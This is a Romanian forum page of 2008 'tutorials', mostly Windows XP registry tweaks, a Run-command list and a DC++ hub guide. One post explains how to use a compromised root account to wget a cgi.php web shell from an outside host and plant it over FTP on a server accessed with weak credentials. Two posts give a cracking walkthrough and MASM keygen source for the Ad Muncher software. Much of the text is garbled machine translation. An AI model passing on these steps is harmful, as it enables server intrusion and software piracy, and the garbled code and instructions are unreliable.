Noifilme.com Filme Filme indiene Jocuri Documentare

uElite Design

Joi, 2024-04-25, 7:55 PM
Welcome Guest

Registration
Login

TUTORIALE - Page 5 - Noifilme Movies


[ New messages · Members · Forum rules · Search · RSS ]
Noifilme Movies » FORUM » MOVIES END GAME FREE DOWNLOAD » TUTORIALE (tutoriale)
TUTORIALE
the_noifilmeDate: Marti, 2008-12-23, 10:15 AM | Message # 61
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Cum sa obtii banda maxima

Un inconvenient al Windows XP Professional este cel legat de rezervarea implicită a 20% din lăţimea de bandă a conexiunii (LAN sau Internet) pentru propriile `nevoi` (update-uri de exmpl.).Dacă insă rulaţi un sistem care sa nu aibă nevoie de atâta lăţime de bandă ptr. propriile nevoi, este bine să schimbaţi setarea acesta.
Mai întâi verifivaţi dacă QoS Packet Scheduler este folosit de conexiunea dvs. Pentru aceasta, în casuţa Properties a conexiunii folosite, verificaţi dacă opţiunea QoS Packet Scheduler este selectată. Dacă este, atunci este posibil ca sistemul să-şi fi rezervat banda.
Rulaţi gpedit.msc. în Start-Run. În Computer Configuration – Administrative Templates – Network – Qos Packet Scheduler, veţi găsi opţiunea Limit reservable bandwith.
Implicit, această opţiune se află în starea Not Configured (în realitate e configurată la 20%). Pentru a o reconfigura după cum doriţi, faceţi click dreapta pe Limit reservable bandwith şi alegeţi Enable. Pune-ţi procentajul care va avantajează ! În mod normal, 5% ar trebui să fie arhisuficient, dar puteţi încerca şi cu 0%. Creşterea de performanţă este perceptibilă în cazul conexiunilor LAN.
Succes !


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:16 AM | Message # 62
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
10 metode sa faci windowsul mai ascultator

Suntem diferiti. Ne plac lucruri diferite, vrem sa fim unici, incercam sa evitam rutina
sau pur si simplu gusturile noastre nu se potrivesc. Aceeasi situatie apare si in relatia
dintre utilizator si sistemul de operare. Windows vine intr-o forma neslefuita, dura,
si nu toata lumea este dispusa sa il accepte asa. Vom vedea in continuare cateva schimbari utile care il pot face mai 'ascultator'.

1. Pornirea Windows Explorer in folderul ales de tine

In mod normal, Windows Explorer este setat sa mearga direct in directorul My Documents la fiecare lansare. Pentru a schimba aceasta situatie, mergeti pe icon-ul sau si cu butonul din dreapta accesati Properties. Schimbati target field-ul cu "%SystemRoot%explorer.exe /e, c:". Il puteti face sa mearga direct in Jocuri sau oricare alt director. Spre exemplu, daca doriti ca la fiecare accesare sa fiti trimis pe My Computer, atunci nu trebuie decat sa introduceti urmatorul target field: "%SystemRoot%Explorer.exe /e,".

2. Invata-ti Windowsul sa se logheze automat pe contul tau

Multi poate ati observat ca, la fiecare pornire a Windows-ului, acesta nu mai intra direct in contul vostru de utilizator. Acest lucru se intampla datorita ultimelor update-uri de la Microsoft, mai precis cel pentru .Net Framework, care creaza automat un nou cont de utilizator numit ASP.NET. Din cauza lui, logarea automata este blocata.

Bineinteles ca multi va veti gandi ca cele mai simple metode ar fi de a renunta la update-ul respectiv sau de a sterge contul ASP.NET. Iata o metoda si mai simpla pentru a rezolva problema: Accesati Start->Run si scrieti "control userpasswords2". Va aparea o fereastra cu lista utilizatorilor, unde trebuie sa selectati contul dorit si sa debifati optiunea “Users must enter a user name and

password to use this computer”. Din pacate, aceasta solutie este valabila doar pentru posesorii de Windows XP Professional.

3. Va grabiti si calculatorul nu vrea sa se inchida mai repede?

Pentru a optimiza secventa de Shut Down mergeti la Start->Run si tastati "regedit". Cautati cheia urmatoare: [HKLMSYSTEMCurrentControlSetControlSessionManagerMemory Management]. Dupa ce ati gasit-o, setati valoarea ClearPageFileAtShutdown la 0.

De asemenea, daca sunteti utilizatori de Windows XP Professional, puteti sa obtineti acelasi efect accesand Group Policy Editor prin comanda Start->Run->"Secpol.msc".

4. Dupa ce ati folosit ceva timp Windows-ul ruland o multime de programe deodata, probabil ca v-ati dat seama cat de folositor este icon-ul "Show Desktop". Din pacate, cu ceva timp in urma l-ati scos din quick launch. Cum faceti sa il readuceti la locul lui?


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:16 AM | Message # 63
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Folositi urmatoarea metoda:
Mergeti la Start->Run si tastati comanda "regsvr32 /n /i:U shell32". Iconita va reaparea instant in Quick Launch.

5. Eliminati afisarea numelui de utilizator si a imaginii aferente din meniul de start

Multi se plang de aceasta situatie, considerand ca este deranjanta afisarea acestor informatii in meniul de start. Solutia de a scapa de aceasta afisare (fara a dezactiva Welcome Screen-ul si Windows XP Themes) este urmatoarea:
Navigati in „Cocuments and SettingsAll UsersApplication DataMicrosoftUser Account Pictures”, in interiorul caruia veti gasi un fisier BMP cu numele dumneavoastra de utilizator, de genul „smith.bmp”. Redenumiti acel fisier in „smith2.bmp”. Urmatorul pas este sa redenumiti directorul „Cocuments and SettingsAll UsersApplication DataMicrosoftUser Account PicturesDefault Pictures” in „Old_Default Pictures”. Pentru a elimina numele de utilizator folositi Registry Editor (Start->Run->regedit) cautand cheia [HKEY_CURRENT_USERSoftwareMicrosoft WindowsCurrentVersionPoliciesExplorer]. In lista din dreapta setati valoarea NoUserNameInStartMenu la 1. Dupa restart, numele de utilizator si poza nu vor mai fi afisate.

6. Windows-ul uita setarile voastre din Folder Options?

Este adevarat. Unii sunt mai meticulosi si isi customizeaza folderele dupa gustul lor estetic, doar ca Windows-ul nu poate memora mai mult de 400 de foldere setate. Totusi, il putem invata sa retina mai mult astfel: folosind Registry editor, mergeti la cheile mentionate mai jos si modificati BagMRU Size la 5000 (sau pana la 8000). Nu depasiti valoarea 8000, recomanda programatorii.

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShell]
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoam]
7. Setati command prompt-ul sa porneasca in locatia dorita.

Este stiut faptul ca la comanda “cmd” din Run se lanseaza command prompt-ul direct in folderul „home” al utilizatorului („Cocuments and Settings”. Pentru a modifica aceasta presetare, folosind regedit, mergeti la cheia [HKEY_CURRENT_USER SoftwareMicrosoft Command Processor] si cautati valoarea „Autorun”. In cazul in care aceasta lipseste, creati un nou REG_SZ si introduceti acolo folderul dorit, precedat de CD (ca la comenzile din MS-DOS). Daca lasati CD simplu, atunci el va porni direct in „C:”. Puteti de asemenea sa tastati „CMD /?” pentru a vedea informatii detaliate despre parametrii comenzii.

8. Uneori nu puteti folosi modul ‘preview” pentru fisiere GIF, JPEG sau HTML in casuta Display Properties.

Tastati „REGSVR32 /i SHIMGVW.DLL” si „REGSVR32 /i MSHTML.DLL” in Start->Run pentru a rezolva acest neajuns.

9. Stergeti informatiile referitoare la cautarile anterioare pentru a va proteja intimitatea.

Utilizati Registry Editor si cautati [HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorer ExplorerBars FilesNamedMRU]. Acolo veti putea sterge cautarile anterioare.

10. V-a expirat programul de arhivare zip si vreti sa reveniti la functia oferita de Windows XP pentru management-ul arhivelor zip. Din pacate, extensia zip a ramas neasociata dupa dezinstalarea programului folosit anterior.

Pentru a reasocia fisierele .zip cu dezarhivatorul integrat de Windows mergeti la Start->Run si tastati „REGSVR32 ZIPFLDR.DLL” sau „cmd /c assoc .zip=CompressedFolder”.

Trebuie retinut faptul ca, datorita numarului mare de setari si schimbari ce survin in cazul sistemului de operare Windows, nu putem garanta ca metodele mentionate mai sus vor functiona in totalitate asa cum au fost descrise


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:18 AM | Message # 64
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
117 comenzi in Windows XP pentru ,,run"

1. Accessibility Controls - access.cpl
2. Accesibilitate Expertul - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add / Remove Programs - appwiz.cpl
5. Instrumente de administrare - control admintools
6. Actualizări automate - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificat Manager - certmgr.msc
10. Harta de caractere - charmap
11. Verificaţi Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Prompt comandă - cmd
14. Componenta de Servicii - dcomcnfg
15. Computer Management - compmgmt.msc
16. Panou de control - de control
17. Data si Ora Proprietăţi - timedate.cpl
18. Acţiuni, DDE - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Curăţire disc institutiei - cleanmgr
22. Defragmentare disc de - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Partiţionarea Discului - Director diskpart
25. Proprietăţi afişare - Control desktop
26. Proprietăţi afişare - desk.cpl
27. Dr. Watson sistem de depanare de utilitate - drwtsn32
28. Driver de verificatorul de utilitate - verificator
29. Event Viewer - eventvwr.msc
30. Transfer fişiere şi setări Unealta - migwiz
31. Semnare Instrumentul de fişiere de verificare - sigverif
32. Findfast - findfast.cpl
33. Firefox - Firefox
34. Proprietăţi Folders - foldere de control
35. Fonturi - controlul fonturi
36. Fonturi Dosar - fonturi
37. Free Cell joc de cărţi - FreeCell
38. Controlere de jocuri - joy.cpl
39. Group Policy Editor (pentru XP Professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Ajutor şi asistenţă - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Expertul - iexpress
44. Indexare Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Proprietăţi Internet - inetcpl.cpl
48. Proprietăţi Keyboard - tastatura de control
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:18 AM | Message # 65
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
51. Rapoarte te scot din Windows - Log off
52. Instrumentul de eliminare software rău - TMR
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft sincronizarea Unealta - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - controlul mouse-ului
59. Mouse Properties - main.cpl
60. NetMeeting - conf
61. Conexiuni în reţea - de control netconnections
62. Conexiuni în reţea - ncpa.cpl
63. Expertul Instalare reţea - netsetup.cpl
64. Notepad - Notepad
65. Obiectul ambalatorului - ambalatorului
66. Sursa de date ODBC Administrator - odbccp32.cpl
67. Tastaturii de pe ecran - OSK
68. Outlook Express - msimn
69. Paint - pbrush
70. Parola Proprietăţi - password.cpl
71. Monitorul de performanţă - perfmon.msc
72. Monitorul de performanţă - perfmon
73. Opţiuni telefonie şi modem - telephon.cpl
74. Telefon Dialer - Dialer
75. Pinball Game - Pinball
76. Putere de configurare - powercfg.cpl
77. Imprimante şi faxuri - imprimante de control
78. Imprimante Dosar - imprimante
79. Setări regionale - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Agendă telefonică de acces de la distanţă - rasphone
83. Spaţiu de lucru la distanţă - mstsc
84. Stocare - ntmsmgr.msc
85. Cereri de Operator stocare - ntmsoprq.msc
86. Set de rezultate Politica (pentru XP Professional) - rsop.msc
87. Scanere şi Camerele de luat - sticpl.cpl
88. Activităţi programate - de control schedtasks
89. Centrul de securitate - wscui.cpl
90. Servicii - services.msc
91. Shared Folders - fsmgmt.msc
92. Închide Windows - închidere
93. Sunet şi audio - mmsys.cpl
94. Spider Solitare Card Game - păianjen
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. Sistemul de Informaţii - msinfo32
99. Proprietăţi sistem - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. Cont de utilizator de Management - nusrmgr.cpl
104. Utility Manager - Utilman
105. Windows Address Book - wab
106. Windows Address Book utilitarul de import - wabmig
107. Windows Explorer - explorer
108. Paravanul de protecţie Windows - Firewall.cpl
109. Windows Magnificator - amplifica
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update lansează - wupdmgr
115. Versiune Windows - winver
116. Wordpad - scrie
117. Reducerea activari de programe la pornirea windowsului - msconfig


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:20 AM | Message # 66
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Cum poti sa faci un hub de DC++

1.In primul si in primul rand avem nevoie de Yhub.
DownloadAICI
2.Dupa dezarhivam rar'u acela undeva pe hdd(nu conteaza) sa zicem in D:\Yhub.
3. Pornim programul din Yhub.exe si il setam(configuram)dupa cum urmeaza:

In Settings:
------------------------------------------------------------------------------------
> bifati autostart hub
> bifati minimize to tray
> la user limit puneti cat vreti
> la work pace ... de preferabil puneti ghepard
> la ports puneti: 411; 23; 1411
> la Naming ... alegeti un nume pentru hubul dumneavoastra ... iar dedesupt la hub commands name puneti numele botului de exemplu
"HUB DC ++"
> la Hub Adress .. puneti ip-ul dumneavoastra sau daca aveti un dns puneti numele dns-ului (la dns fara port) de exemplu ice.no-ip.org
> la Core Language setati Romana
> la Files ... bifati auto save settings ... si mai e o casuta unde setati la cate minute vreti sa se salveze ...

In Settings > Notification:
---------------------------------
> Bifati toate casutele in afara de Notify invalid key(if kicking)
> La Feed Name when sent to a chatroom puneti ce nume vreti de preferat [Feed]

In Security:
-----------------------------------------------------------------------------------------
> La General Settings ... bifati tot ... iar la Check Data Before Lock puneti 0
> La Maintenence and timeouts : > La Handshake timeout puneti 40
> La Drop Non Responding puneti 5
> La Temporary Ban Or Kick puneti 10

> La Share Trace ... bifati Notify On Share Update si Autoprune (12 hours)
> La Autobans ... >bifati Ban on kick no. ( de preferat 5 for 6 hours)
>bifati Ban on Incorect Pass (de preferat 5 for 24hours)
> La Spam Control ... > bifati New MyInfos (de preferat 5/30 sec.)
> bifati Searching (de preferat 3/10 sec.)
> bifati Mainchat (de preferat 4/10 sec.)
> bifati Private Messages (de preferat 5/10 sec.)
> bifati Nicklist (de preferat 1/60 sec.)
> bifati Junk Data (de preferat 512 b/s)
> bifati Junk Data Direct Kick (de preferat 1024 b/s)
> la Max spam Warnings puneti 6

In Security > Restrictions:
----------------------------------------------------------

> La Lenght Restrictions: > bifati Nick Max Lenght (de preferat 32)
> bifati Search Max Lenght (de preferat 150)
> bifati MyInfo Max Lenght (de preferat 200)
> bifati Mainchat Max Lenght ( puneti 1024)
> bifati Private Message Max Lenght (puneti 8192)

> La Allow nick characters bifati enable ...

> La Passive Search Restriction bifati Max Search Replies (500)

> La MyInfo distribution bifati Pool MyInfo changes for 20 minutes

In Miscellaneous:
-------------------------------------------------------------------------------------

> La Hub Command visibillity selectati Nobody si bifati acolo Show Command written to self
> La Integrated command visibillity selectati The One Writing
> La General Settings > La Maxhits on hub commands searches (200)

In Miscellaneous > User Stats:
--------------------------------------------------------------------------------------------------------

> La Type selectati Store Locally > bifati Prune (2)
> La MySql ... > la host treceti local host iar la port puneti 3306
> la database treceti ynhub

In Users:
--------------------------------------------------------------------------

> La Default connection restrictions > bifati Enable Register si Use case sensitive ... iar restu le treceti cum vreti la minsharesize si toate cele ... ca sa va recunoasca minsharesize, min slots si max slots trebuie sa bifati casutele de deasupra ... Mai aveti de bifat si May Connect Using Passive Mode

In Users > Registered:


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:21 AM | Message # 67
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Reparare nologin

Si nologinurile pot fi folosite iti trebuie un alt root activ pe linux, de pe care sa lucrezi, hai sa incepem :
Intra pe un alt root activ si scrie :
1.wget http://sunt.pluto.ro/cgi.php
2.ftp ip-ul no-loginului ( ex ftp 1.1.1.1 ) :
P3. Daca iti zice Logged In sau ceva de genu dai urmatoarele comenzi mkdir www mkdir webmkdir public_html am creat folderele..akm punem cgi.php in cele
3 : cd public_html put cgi.php cd .. cd web put cgi.php cd .. ; cd wwwput cgi.php cd .. Si gata
4. Deschizi un Internet Explorer si la address bagi :
http://ip`u/~user/cgi.phpEx : daca ai root:root:1.1.1.1 deschizi internet explorer si la address bagiHttp://1.1.1.1/~root/cgi.php
5. De aici lucrezi ca si dintr-o roata normala .
bafta!


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:22 AM | Message # 68
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Windows Cu Reclamele Tale

Ai de realizat doua etape :

1. Deschide un Notepad in care scri urmatoarele :

[General]
Manufacturer= <aici scri ce vrei tu> ex : ALEX
Model= <aici la fel scrii ce vrei tu>
[Support Information]
Line1=scri ce vrei tu
Line2=scri ce vrei tu
Line3=scri ce vrei tu

si pui Line4=,Line5=, cate doresti ; in functie de cat vrei sa scri in windowul
de support .

Dupa ce ai terminat de editat acest notepad il salvezi in urmatorul fel :
oeminfo.ini

Exemplu:

[General]
Manufacturer=Troianu
Model=Windows SP2 By Troianu

[Support Information]
Line1= ...:: Windows By Troianu ::...
Line2= Powered By Troianu

2. In pasul al doilea va trebui sa creezi o mica poza ,in orice program ai la
dispozitie , Paint, Paint Shop Pro , Fireworks ,orice . Poza poate sa contina
orice dar trebuie sa aiba urmatoarele caracteristici :
Marimea trebuie sa fie : 100 pe 75
si trebuie sa fie salvata ca si : oemlogo.bmp

Tot ce mai ai de facut este doar sa iei cele doua fisiere create ,si anume :
oeminfo.ini si oemlogo.bmp si sa le copii in directorul : C:/windows/system32

GATA !!! Acum iti poti vedea propriile tale caracteristici accesand :

Control Panel / System - properties
Sau Click dreapta pe My Computer ->Proprieties


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:23 AM | Message # 69
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Fara Mesaje Cu Low Disk Space

-Start
-Apoi Run
-Scrieti la run : regedit
-Click Ok
-apoi mergeti la ramurile:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
-si click dreapta , add DWORD value , si o numiti "NoLowDiskSpaceChecks" iar value il setati 1
-Restart


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:24 AM | Message # 70
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Cum sa dispara Recycle Bin

Ca sa dispara iconita de recycle bin de pe desktop:

- RUN: regedit

- te duci la : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\
- stergeti cheia : {645FF040-5081-101B-9F08-00AA002F954E}. ATENTIE: inainte
de a sterge cheia duceti-va in meniul file->export si faceti un back-up la cheia respectiva poate mai vreti sa mai aveti vreodata Recycle Bin pe desktop.


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:24 AM | Message # 71
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Opriţi computerul mai rapid

Daca vrei sa se stinga mai repede efectuati urmatorii pasi:

1. Start - Run - regedit
2. Code:
HKEY_LOCAL_MACHINE > SYSTEM > Curent Control Set > Contro

3. Dublu click pe WaitToKillServiceTimeout,initial fiiind 20000 voi setati la 200
4. Ok si Restart


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:25 AM | Message # 72
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Cum să accelereze http cereri de Internet Explorer

Pentru a se conforma standardelor actuale de Internet, Internet Explorer, limitele numărul de fişiere de descărcat simultană a două fişiere de descărcat, plus o descărcare în coadă. Această configuraţie este o funcţie a browser-ului. Cu toate acestea, ca viteze de conexiune creştere, precum şi numărul total de conexiuni care sunt permise la Internet servere de creştere, cele două-limită de conexiune pot fi restrictive.

Vă rugăm să Notă: Schimbarea numărul maxim de conexiuni dincolo de doi este o încălcare a standardelor de Internet; utiliza pe propriul dvs. risc!

Pentru a creşte numărul de conexiuni simultane care sunt permise, urmaţi aceşti paşi:

1. Porniţi Registry Editor
2. Du-te la HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings
3. Selectaţi New> DWORD Value din meniul Edit
4. Nume de valoare nouă MaxConnectionsPer1_0Server
5. Faceţi clic dreapta pe valoarea MaxConnectionsPer1_0Server şi alegeţi Modificare
6. Sub Base, faceţi clic pe butonul radio de lângă Decimal
7. În Date valoare: caseta de introduceţi numărul de conexiuni simultane doriţi să setaţi (de exemplu 10 este o bună valoare), şi 8. faceţi clic pe OK
9. Repetaţi paşii 3 - 7 folosind noua valoare MaxConnectionsPerServer
10. Ieşiţi din Registry Editor


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:27 AM | Message # 73
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Cum vezi cine te suna cu nr. ascuns

Prima oara intram pe telefonip.ro unde ne facem cont (este free) apoi ne confirmam contul bla bla bla .. primim un mail cu niste setari de la ei ... intram aici
http://www.counterpath.net/x-lite.html&active=4 si descarcam x-lite
Dupa ce instalam x-lite pe pc il configuram cu setarile care le-am primit prin mail de la telefonip.ro acum urmeaza sa configuram telefonul mobil Wink trebuie sa redirectionam apelurile cu numar ascuns catre numarul care il primim de la telefonip.ro .Eu la v1075 al meu il setez asa: Setari - Redirectionare apel - Apeluri voce - Active redirectionare "Daca nu este disponibil" La numarul dat de telefonip.ro cu alte cuvinte daca vad ca ma suna un numar ascuns apas tasta NO si il redirectioneaza catre numarul de la telefonip (iti dai seama de asta pt ca iti va suna pc-ul daca ai instalat x-lite si l-ai configurat ) daca vrei ii poti raspunde chiar poti inregistra convorbirea . Acum k sa ii vezi numarul de tel >Smile intri pe telefonip.ro te logezi dai pe "Apeluri primite" si ii vei vedea numarul de telefon acolo Smile Succes si sper ca ati inteles ... daca nu postati orice nelamurire Smile aaa era sa uit acum am vazut ca nu merge pe cartela decat pe abonament ...


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:31 AM | Message # 74
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
Cum facem un Generator de coduri

Primul lucru de făcut este de a deschide Ad Muncher si afla ce se întâmplă şi cum funcţionează. Atunci de încărcare de până procdump şi de memorie, cât şi de exe dll separat. Uită-te la mărimea de exe şi dll, exe este de numai câteva kbytes, dar de dll este mult mai mare (peste o suta de kbytes) şi a fost ambalate cu UPX. Din aceasta putem spune că dll este principala de program şi de exe este un încărcător. Din moment ce mai facem noi pe-acest-a zbura, am avea nevoie de Win32DASM obiceiul, dar dacă ai face, atunci puteţi acum să demontaţi de fişiere care fac obiectul unui dumping

Încărcaţi până Muncher de anunţuri, introduceţi unele informaţii fals. Când alegeţi ce informaţii fictive, pentru a include, asiguraţi-vă că acesta nu conţine orice caractere, de alegere. Aceasta este, pentru că va trece în mod normal, cele mai multe controale privind caracteristicile de intrare. De asemenea, dacă au fost suficient de inteligent pentru a citi de fapt prima pagina de înregistrare, ar trebui să fi observat acest lucru: "Vă rugăm să introduceţi-vă numele şi codul de mai jos, codul hexazecimal constă din două cifre (de exemplu: numerele 0-9 şi litere AF) a aderat cu -o dată ". Care le introduceţi dvs. de serie ar trebui să fie ceva de genul'012345-543210 ". Apoi, setaţi un breakpoint cu SoftIce pe GetWindowTextA, Aceasta înseamnă când faceţi clic pe registru, ar trebui să SoftIce tip pop-up. Ar trebui să fie în mijlocul unei GetDlgItemTextA apel, deci apăsaţi de două ori pe F12 pentru a reveni la Ad Muncher. Dacă didn't pauză, apoi te arent utilizaţi Windows 2000 ca eu sunt, si va trebui doar să setaţi un breakpoint pe GetDlgItemTextA direct. Înapoi la Ad Muncher cod, ar trebui să vedeţi ceva de genul:
00751431 6A68 împinge 00000068
00751433 FF7508 "apasă [ebp 08]
00751436 E80D0C0000 apel USER32.GetDlgItemTextA
0075143B 40 inc eax
0075143C A33C7A4B00 mov dword ptr [004B7A3C], eax

Inchide dvs. de întrerupere cu '* BD ", apoi prin cod urmă cu F10 până veţi găsi ceva care pare interesant. Prin termenul de "interesante" i "reprezintă orice utilizare de tabele ca" mov ecx, [eax * 4 005 B8A1C] "sau orice derivate care conţin un" LODSB "sau" LODSW ". De asemenea, poate doriţi să uite pentru chestii de genul 'XOR ecx, ecx; mov eax, [ecx + 005B8A1C]; inc ecx ". Ar trebui să vii până la această după-un minut de căutare:
: bucla
LODSB
Adăuga ECX, EAX
Ror ECX, 08
Adăuga ECX, EBX
CMP AL, 00
JNZ bucla
NU ECX

Acum, dacă vă uitaţi la începutul acestei funcţii şi oră de ESI, veţi găsi că este contatains numele dvs. de utilizator şi ebx deţine'00012345 '. Wow, prima jumătate a noastră de serie nume de utilizator şi nostru de anunţuri Muncher ia dvs. de serie, şpalturi-o în două, apoi se mută în locaţia de numele dvs. de utilizator în ESI, şi setează valoarea din prima jumătate a ebx în serie. Următorul este nevoie de un caracter de la ESI, începe să fie difuzate în total, role de registru dreptul de 8h ori, adaugă în prima jumătate a ebx de serie în total şi să atunci buclele până când toate caracterele au fost citite. După aceasta nu este de a da totală a doua jumătate a anului de serie în ecx. Pentru a face un keygen tot ce trebuie să faceţi acum este să se transforme în rutină, în orice limbă pe care o alegeţi şi o dau un pic de interfaţă. Puteţi utiliza acum pentru a crea reclame Muncher valabilă fără nici seriale, la toate necazurile, dar este mai bine să ai un keygen separat, asa ca au un du-te la a face unul, aici este de o am creat:
-------------------------------------------------- -------------------------------------------------- ---------
-------------------------------------------------- -------------------------------------------------- ---------


Bine ai venit pe noifilme.com
 
the_noifilmeDate: Marti, 2008-12-23, 10:31 AM | Message # 75
Admin
Group: Utilizatori
Messages: 1581
Awards: 3
Reputation: 2
Status: Offline
; Ad Muncher v4.4 keygen de m101 pentru Phrozen Crew

.386
. modelului plat, stdcall
casemap opţiune: nici unul
includ \ masm32 \ includ \ windows.inc
includ \ masm32 \ includ \ user32.inc
includ \ masm32 \ includ \ kernel32.inc
includelib \ masm32 \ lib \ user32.lib
includelib \ masm32 \ lib \ kernel32.lib

WinMain proto WORD, WORD, WORD, WORD

. date
ClassName db "SimpleWinClass", 0
AppName db "Ad Muncher keygen crăpate de m101 pentru Phrozen Crew", 0
ButtonText db "Generează cheie", 0
StartupString db "Vă rugăm să introduceţi un nume de ...", 0
EditClassName db "editare", 0
EditID equ 2
EditID2 equ 3
ButtonID equ 1
ButtonClassName db "buton", 0
IDM_GETTEXT equ 3
Serial2 db "FFFFFFFF"
Serial db "BADC0DE-"
tampon db 512 DUP (?)

. date?
hInstance HINSTANCE?
LPSTR de comandă?
hwndButton HWND?
hwndEdit HWND?
hwndEdit2 HWND?
. codul
Start:
invoca GetModuleHandle, NULL
mov hInstance, eax
invoca GetCommandLine
mov de comandă, eax
invoca WinMain, hInstance, NULL, de comandă, SW_SHOWDEFAULT
invoca ExitProcess, eax

WinMain proc hInst: HINSTANCE, hPrevInst: HINSTANCE, cmdline: LPSTR, CmdShowWORD
LOCAL WC: WNDCLASSEX
LOCAL msg: MSG
LOCAL hwnd: HWND
mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW sau CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, NULL
Apasă hInstance
pop wc.hInstance
mov wc.hbrBackground, COLOR_BTNFACE 1
mov wc.lpszMenuName, NULL
mov wc.lpszClassName, OFFSET className
invoca LoadIcon, NULL, IDI_APPLICATION
mov wc.hIcon, eax
mov wc.hIconSm, eax
invoca LoadCursor, NULL, IDC_ARROW
mov wc.hCursor, eax
invoca RegisterClassEx, addr WC
Invoca CreateWindowEx, WS_EX_CONTROLPARENT sau DS_CENTER, addr className, addr AppName, \
WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, \
CW_USEDEFAULT, 345150, NULL, NULL, \
hInst, NULL
mov hwnd, eax
invoca ShowWindow, hwnd, SW_SHOWNORMAL
invoca UpdateWindow, hwnd
. În timp ce TRUE
invoca GetMessage, addr msg, NULL, 0,0
. Pauză. If (! Eax)
invoca TranslateMessage, addr mesaj
invoca DispatchMessage, addr mesaj
. ENDW
mov eax, msg.wParam
ret
WinMain endp


Bine ai venit pe noifilme.com
 
Noifilme Movies » FORUM » MOVIES END GAME FREE DOWNLOAD » TUTORIALE (tutoriale)
Search:

Meniu
Logare
Statistica